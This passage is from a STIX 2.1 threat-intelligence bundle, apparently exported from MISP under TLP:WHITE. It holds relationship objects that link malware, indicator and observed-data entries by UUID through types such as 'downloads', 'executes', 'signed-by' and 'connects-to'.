"uuid": "391c66d8-a317-4d3c-ad8c-d22e96639603"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--8fb1b0ab-8275-4d7d-bf33-fff50945409b",
"created": "2024-09-19T07:27:14.000Z",
"modified": "2024-09-19T07:27:14.000Z",
"relationship_type": "downloads",
"source_ref": "malware--7b88da77-5001-4565-926e-965d55319a24",
"target_ref": "indicator--5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--a7ad8124-928f-4630-9572-0a842e4f054f",
"created": "2024-09-19T06:27:57.000Z",
"modified": "2024-09-19T06:27:57.000Z",
"relationship_type": "contains",
"source_ref": "observed-data--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--11f78223-6aa5-498f-ade3-7614709517ab",
"created": "2024-09-19T06:28:27.000Z",
"modified": "2024-09-19T06:28:27.000Z",
"relationship_type": "contains",
"source_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"target_ref": "malware--a4e7b874-225e-4206-9cf8-f858854d4ca5"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--28aaf756-8380-4651-8f67-8179d33ae7eb",
"created": "2024-09-19T06:43:52.000Z",
"modified": "2024-09-19T06:43:52.000Z",
"relationship_type": "describes",
"source_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"target_ref": "x-misp-object--b53c8423-c8a7-4863-a01a-3e9eebcb199f"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--778739ce-7d62-407e-b7d7-47738f1f20a7",
"created": "2024-09-19T06:42:41.000Z",
"modified": "2024-09-19T06:42:41.000Z",
"relationship_type": "describes",
"source_ref": "x-misp-object--74c5c23f-d5e2-4407-b36a-94bb95135a77",
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--e330e7a8-ca8d-4c09-a08d-995897dd83a5",
"created": "2024-09-19T07:27:51.000Z",
"modified": "2024-09-19T07:27:51.000Z",
"relationship_type": "references",
"source_ref": "x-misp-object--a9e61709-f87b-460b-9b43-03e65c73158e",
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--2e94d260-5c02-44f7-b254-ae11af7a2fb9",
"created": "2024-09-19T07:27:30.000Z",
"modified": "2024-09-19T07:27:30.000Z",
"relationship_type": "describes",
"source_ref": "x-misp-object--8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--cd29672f-ec6e-4c10-964e-15f32d57a4cd",
"created": "2024-09-19T07:26:21.000Z",
"modified": "2024-09-19T07:26:21.000Z",
"relationship_type": "executes",
"source_ref": "x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
"target_ref": "malware--7b88da77-5001-4565-926e-965d55319a24"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--ea68661a-18d8-4e1e-ad7f-072952fb7b1b",
"created": "2024-09-19T07:26:47.000Z",
"modified": "2024-09-19T07:26:47.000Z",
"relationship_type": "executes",
"source_ref": "x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
"target_ref": "malware--a4e7b874-225e-4206-9cf8-f858854d4ca5"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--b21581ce-31d2-422c-b108-c7c3ee1c94c9",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"relationship_type": "signed-by",
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"target_ref": "observed-data--d98b9983-dd3f-46e0-886f-d239c9901b8f"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--16799923-4654-457e-8d30-1d5975e69155",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"relationship_type": "signed-by",
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"target_ref": "observed-data--e64b7f30-9aed-4fff-823b-72c2a22b16f8"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--09f6a1c4-3452-443e-a223-ab9687823be4",
"created": "2024-09-19T06:17:26.000Z",
"modified": "2024-09-19T06:17:26.000Z",
"relationship_type": "signed-by",
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"target_ref": "x-misp-object--c30b4f6b-e94d-4995-9e2a-ab675a47a020"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--0bbed3e1-5677-41b6-b35a-75adfa959e7e",
"created": "2024-09-19T06:40:10.000Z",
"modified": "2024-09-19T06:40:10.000Z",
"relationship_type": "connects-to",
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"target_ref": "indicator--8ad8f83d-4f64-4a66-8849-e6b3fe938725"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}